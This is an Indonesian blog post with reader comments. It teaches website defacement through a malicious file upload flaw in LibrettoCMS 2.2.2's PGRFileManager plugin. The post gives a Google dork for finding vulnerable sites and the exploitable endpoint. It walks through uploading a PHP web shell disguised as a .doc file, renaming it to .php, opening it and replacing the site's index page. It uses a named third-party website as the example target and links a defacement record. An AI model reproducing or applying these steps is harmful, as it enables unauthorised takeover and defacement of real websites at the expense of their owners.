Kali ini saya akan share teknik deface dengan exploit LibrettoCMS 2.2.2 Malicious File Upload. Exploitnya sangat mudah dipraktekkan terutama bagi para newbie seperti saya.
Oke langsung saja :
Bahan :
Shell php yang telah direname menjadi shell.doc
Dork :
inurl:adm/ui/js/ckeditor/plugins/pgrfilemanager
Exploit :
http://target/librettoCMS/adm/ui/js/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Step by Step :
Mulai berselancar di google. Cari target yang sabar.
Misalnya saya pilih http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/css/le-frog/
Ubah menjadi
http://www.bluespacethinking.com/assets/js/plugins/ckeditor/plugins/pgrfilemanager/PGRFileManager.php
Upload shell yang telah direname menjadi shell.doc.
Lihat gambar :
Setelah upload berhasil, rename shellnya menjadi shell.php
Akses shellnya di site/assets/user/shell.php
Hajar index. 🙂
http://www.bluespacethinking.com
http://www.hack-db.com/518922.html
Sekian dari saya, semoga bermanfaat. 🙂
Created by nabilaholic – www.madura-cyber.org
Wahyu Dwi says
mantep nih, pagi2 udah share pepes2 an >.<
Andre Irawan says
#Tsaahh
NewbieHacker061099.php says
mantap (Y) 😛 melodiest48 siapa tuh?
chiaki says
Maho seberang lautan. :v
Mas Nady says
kunjungan siang sob.. saya nyimak saja dech sob.. belum paham dengan CMS hehehe
Marisa Dwi Puspa says
Izin nyimak ya sob, aku belum tau apa-apa tentang postingan ini, hehehhe…. Mungkin dibookmark dulu aja, siapa tau butuh ntar
Irfan VBH says
Dorknya gak Jumpak Pak 🙁
Ihza Novellino says
Uploadnya lama ya :/